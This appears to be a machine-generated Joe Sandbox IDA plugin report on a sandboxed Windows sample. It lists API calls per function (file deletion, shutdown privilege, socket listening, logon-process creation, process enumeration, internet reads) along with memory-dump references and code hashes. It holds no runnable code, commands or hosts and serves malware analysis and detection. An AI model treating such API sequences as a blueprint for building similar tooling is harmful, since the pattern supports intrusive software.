                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: b03adca078b824660d68d3d1193635ac3783ec62e6e9f43e3d8cc5247f038ac1
                                                          • Instruction ID: 55de2f476eace020f7a57870936593ca772753d4b4c49dd93a55a4e120328e2d
                                                          • Opcode Fuzzy Hash: b03adca078b824660d68d3d1193635ac3783ec62e6e9f43e3d8cc5247f038ac1
                                                          • Instruction Fuzzy Hash: 4D129C70A00609EFCF19DFA4D981AEEB7F5FF48304F108569E44AEB650EB39A914CB50
                                                          APIs
                                                            • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003C3B89
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003C3BD9
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C3BEA
                                                          • FindClose.KERNEL32(00000000), ref: 003C3C01
                                                          • FindClose.KERNEL32(00000000), ref: 003C3C0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
                                                          • Instruction ID: bbc303e0f1f06f5e70bf642a146e3d5e7798f2cf3b2265c04baa291a3e5b843e
                                                          • Opcode Fuzzy Hash: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
                                                          • Instruction Fuzzy Hash: DF316D350083859FC312EB24C891DAFB7E8AE95304F408E2DF4D59A191EB21DE08CB67
                                                          APIs
                                                            • Part of subcall function 003B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
                                                            • Part of subcall function 003B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
                                                            • Part of subcall function 003B87E1: GetLastError.KERNEL32 ref: 003B8865
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003C51F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
                                                          • Instruction ID: 9a056b0ed1bf8762705fc0b9135c59211e9e63300703fe58e0b8c2724b274abc
                                                          • Opcode Fuzzy Hash: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
                                                          • Instruction Fuzzy Hash: 7E01F7316916156BF72A62689C8BFBB72DC9B05350F250D2DF913EA4D2DA917C808790
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006), ref: 003D62DC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D62EB
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003D6307
                                                          • listen.WSOCK32(00000000,00000005), ref: 003D6316
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D6330
                                                          • closesocket.WSOCK32(00000000), ref: 003D6344
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
                                                          • Instruction ID: d11df50490c904097e89bfbf57c3595d6cd76563e81eb792cea51377425fa059
                                                          • Opcode Fuzzy Hash: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
                                                          • Instruction Fuzzy Hash: 6321D5756002009FCB12EF64D886B6EB7ADEF49310F15825AE926AB3E1C770AD01CB51
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
                                                          • CloseHandle.KERNEL32(00000004), ref: 003B8603
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
                                                          • Instruction ID: 8e2ffa918cedae5555949bee5920ee5d7d5cdcacade38d2f3394287cee096c67
                                                          • Opcode Fuzzy Hash: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
                                                          • Instruction Fuzzy Hash: 4B11387250124DAFDF128FA4DD49BEA7BADEB48348F054165BE04A61A0C6719E60DB60
                                                          APIs
                                                            • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                            • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                          • _memmove.LIBCMT ref: 003B0258
                                                          • _memmove.LIBCMT ref: 003B036D
                                                          • _memmove.LIBCMT ref: 003B0414
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1300846289-0
                                                          • Opcode ID: fefc19f82d9c44d92cbb4446c17d1ef663174da88f9b0f7c523a26e0c099cf77
                                                          • Instruction ID: e7030ff1f551176c258e9db48c84a047f9f8206b150366991dba1e60659b671b
                                                          • Opcode Fuzzy Hash: fefc19f82d9c44d92cbb4446c17d1ef663174da88f9b0f7c523a26e0c099cf77
                                                          • Instruction Fuzzy Hash: 6902D070A00209DBCF1ADF64D981AAEBBF5EF44304F14C4A9E90ADF255EB34DA54CB91
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 003619FA
                                                          • GetSysColor.USER32(0000000F), ref: 00361A4E
                                                          • SetBkColor.GDI32(?,00000000), ref: 00361A61
                                                            • Part of subcall function 00361290: DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
                                                          • Instruction ID: 5f907445d8b3ffbbaab8e8a951601563a118acfc099c7982cf3abef1332a4d54
                                                          • Opcode Fuzzy Hash: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
                                                          • Instruction Fuzzy Hash: 2BA19B70112594BEEA3BAB69DC48EBF259CDB42346F1E8219F402DA5DACB208D01C2B5
                                                          APIs
                                                            • Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000), ref: 003D7DB6
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003D679E
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D67C7
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003D6800
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D680D
                                                          • closesocket.WSOCK32(00000000), ref: 003D6821
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
                                                          • Instruction ID: f7413fc8082be1498eb8ad028a30d2440433fbefae96ce790256fa8871ef1598
                                                          • Opcode Fuzzy Hash: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
                                                          • Instruction Fuzzy Hash: 4341C375A00214AFDB12AF64DC87F6E77EC9B09754F04C55AF91AAF3D2CA709D0087A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
                                                          • Instruction ID: ab493fdfef19afc6c91880952be4fb18116df50b1c30f69a898f0d8ad58c1521
                                                          • Opcode Fuzzy Hash: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
                                                          • Instruction Fuzzy Hash: B111B6717009A19FDB235F279C84B6ABB9CEF457A5B418529F845DB2C1CBB09C018AA4
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
                                                          • Instruction ID: 0e6a5faadfd1cc10f6bfeee04cec6bd4e66f3864c200580fcf4f2a09bd990e2f
                                                          • Opcode Fuzzy Hash: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
                                                          • Instruction Fuzzy Hash: 53F06835241244AFD7224F65DCCDEA73BACEF85759F010125F645C6190CBA1DD41DA60
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00364AD0), ref: 00364B45
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00364B57
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
                                                          • Instruction ID: 690784e3201b56e1d8f5fc11a7d29827e168ee9fc23a4fcac2b2af2602a963a6
                                                          • Opcode Fuzzy Hash: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
                                                          • Instruction Fuzzy Hash: 0CD01234E10767CFDB229F32D858B4676D8AF45351F11C93DD4C6DA190D6B0D480C654
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 003DEE3D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 003DEE4B
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 003DEF0B
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003DEF1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
                                                          • Instruction ID: 1110e38078146f551e7dd7c6d5b85c7e31b673d92016d8ab95c851c1d41bdb9d
                                                          • Opcode Fuzzy Hash: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
                                                          • Instruction Fuzzy Hash: 435171725043119FD322EF24DC81E6BBBE8EF94750F50892DF5959B2A1DB70A904CB92
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003BE628
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: d2e871282e86f2ae9a420910ffdd7f35e95bd7b7976cb18900ee320335f1a13a
                                                          • Instruction ID: ddeb71de55b567756b80559fecca5180ae7c1a16f6756a7d1276b82c98d416dd
                                                          • Opcode Fuzzy Hash: d2e871282e86f2ae9a420910ffdd7f35e95bd7b7976cb18900ee320335f1a13a
                                                          • Instruction Fuzzy Hash: C6324675A007059FD729CF19C481AAAB7F0FF48314B12C56EE99ADB7A1EB70E941CB40
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003D180A,00000000), ref: 003D23E1
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003D2418
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 84e8c3bcdbadac49aaa662d29391c2fd4b860d00faeef370c6f597138f974a70
                                                          • Instruction ID: 35df0148ad072df9f91b482bbe9a68da421672256eabe901960767c8332e9e48
                                                          • Opcode Fuzzy Hash: 84e8c3bcdbadac49aaa662d29391c2fd4b860d00faeef370c6f597138f974a70
                                                          • Instruction Fuzzy Hash: 7341F776904309BFEB22DE96EC81EBB77BCEB50314F10406BFA01A6740DA759E419650
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003CB343
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003CB39D
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003CB3EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
                                                          • Instruction ID: d86032159247edca225688d0f8bb485f5316250ba191b69ad1f3c75757916066
                                                          • Opcode Fuzzy Hash: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
                                                          • Instruction Fuzzy Hash: 5D215C75A00508EFCB01EFA5D881EEDBBB8FF49314F1481AAE905EB355CB31A915CB51
                                                          APIs
                                                            • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                            • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
                                                          • GetLastError.KERNEL32 ref: 003B8865
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 6c4d0b918713f799327cde660193b4163d3b0e39056267dba212f69bbffb7452
                                                          • Instruction ID: aa242cb84a11beee5b9da12d53a59a0890bd94cfdc77ddc9cbf908fc5450c5ee
                                                          • Opcode Fuzzy Hash: 6c4d0b918713f799327cde660193b4163d3b0e39056267dba212f69bbffb7452
                                                          • Instruction Fuzzy Hash: 70119DB2414304AFE729EFA4DC85D6BB7ADFB44314B20852EF45587651EA70BC04CB60
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003B8774
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003B878B
                                                          • FreeSid.ADVAPI32(?), ref: 003B879B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
                                                          • Instruction ID: 43e82a9e57bd10509ad5eb88169c3c80034b4643170712c07251b09a700baa2a
                                                          • Opcode Fuzzy Hash: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
                                                          • Instruction Fuzzy Hash: CAF04975A1130CBFDF10DFF4DC89ABEBBBCEF08311F1045A9AA01E6581E6716A048B50
                                                          APIs
                                                          • __time64.LIBCMT ref: 003C889B
                                                            • Part of subcall function 0038520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003C8F6E,00000000,?,?,?,?,003C911F,00000000,?), ref: 00385213
